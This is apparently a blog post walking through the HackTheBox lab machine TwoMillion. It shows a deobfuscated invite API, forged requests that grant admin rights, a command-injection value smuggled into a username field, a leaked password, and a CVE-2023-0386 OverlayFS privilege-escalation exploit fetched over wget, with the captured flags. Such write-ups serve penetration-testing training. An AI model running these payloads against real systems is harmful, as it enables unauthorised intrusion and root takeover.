freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升
maptnh 2025-01-27 19:17:38 48977
所属地 福建省

Information Gathering

IP AddressOpening Ports
10.10.11.221TCP:22,80

$ sudo masscan -p1-65535,U:1-65535 10.10.11.221 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.221

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

JS Code Deobfuscation && Unauthorized API Access RCE

# echo '10.10.11.221 2million.htb'>>/etc/hosts

image.png

$ dirsearch -u http://2million.htb

image-1.png

image-2.png

view-source:http://2million.htb/js/inviteapi.min.js

image-3.png

JavaScript 混淆代码解析

image-4.png

function verifyInviteCode(code) {
    var formData = { "code": code };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function(response) {
            console.log(response);
        },
        error: function(response) {
            console.log(response);
        }
    });
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/generate',
        success: function(response) {
            console.log(response);
        },
        error: function(response) {
            console.log(response);
        }
    });
}

image-5.png

$ echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr'|tr 'A-Za-z' 'N-ZA-Mn-za-m'

image-6.png

POST /api/v1/invite/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

  

image-7.png

DATV8-W1GS1-U5MY1-E43OY

image-8.png

http://2million.htb/home

image-9.png

image-10.png

用户 API

请求方式路由说明
GET/api/v1路由列表
GET/api/v1/invite/how/to/generate邀邀请码生成说明
GET/api/v1/invite/generate生成邀请码
GET/api/v1/invite/verify验证邀请码
GET/api/v1/user/auth检查用户是否已认证
GET/api/v1/user/vpn/generate生成新的 VPN 配置
GET/api/v1/user/vpn/regenerate重新生成 VPN 配置
GET/api/v1/user/vpn/download下载 OVPN 文件
POST/api/v1/user/register注册新用户
POST/api/v1/user/login登录已有用户

管理员 API

请求方式路由说明
GET/api/v1/admin/auth检查用户是否为管理员
POST/api/v1/admin/vpn/generate为特定用户生成 VPN
PUT/api/v1/admin/settings/update更新用户设置

GET /api/v1/user/vpn/download HTTP/1.1

openvpn配置文件

image-11.png

查看权限

image-12.png

升级管理员

image-13.png

image-14.png

image-15.png

PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 47


{
"email":"maptnh@gmail.com",
"is_admin":1
}

image-16.png

image-17.png

POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 35


{
"username":"maptnh@gmail.com"
}

image-18.png

{
"username":"x|id #"
}

image-19.png

image-20.png

image-22.png

username:admin
password:SuperDuperPass123

$ ssh admin@10.10.11.221

image-23.png

User.txt

6a9c99994e4334df9edc1fc13bca997b

Privilege Escalation:OverlayFS

在/var/spool/mail/admin有一封邮件

From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

提到了 OverlayFS / FUSE 漏洞

image-21.png

$ git clone https://github.com/puckiestyle/CVE-2023-0386.git

$ tar -czvf CVE-2023-0386.tar.gz ./CVE-2023-0386

admin@2million:/tmp$ wget http://10.10.16.16/CVE-2023-0386.tar.gz

admin@2million:/tmp$ tar -zxvf CVE-2023-0386.tar.gz

admin@2million:/tmp/CVE-2023-0386$ make all

admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc

admin@2million:/tmp/CVE-2023-0386$ ./exp

image-24.png

Root.txt

35ed55b48c40b4a093970f40eda0281c

# CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 296 文章数
  • 60 关注者
[Meachines] [Easy] Armageddon Drupal 7 RCE+TRP00F权限提升+Snap dirty_sock权限提升
2025-03-01
[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入
2025-03-01
[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升
2025-03-01
文章目录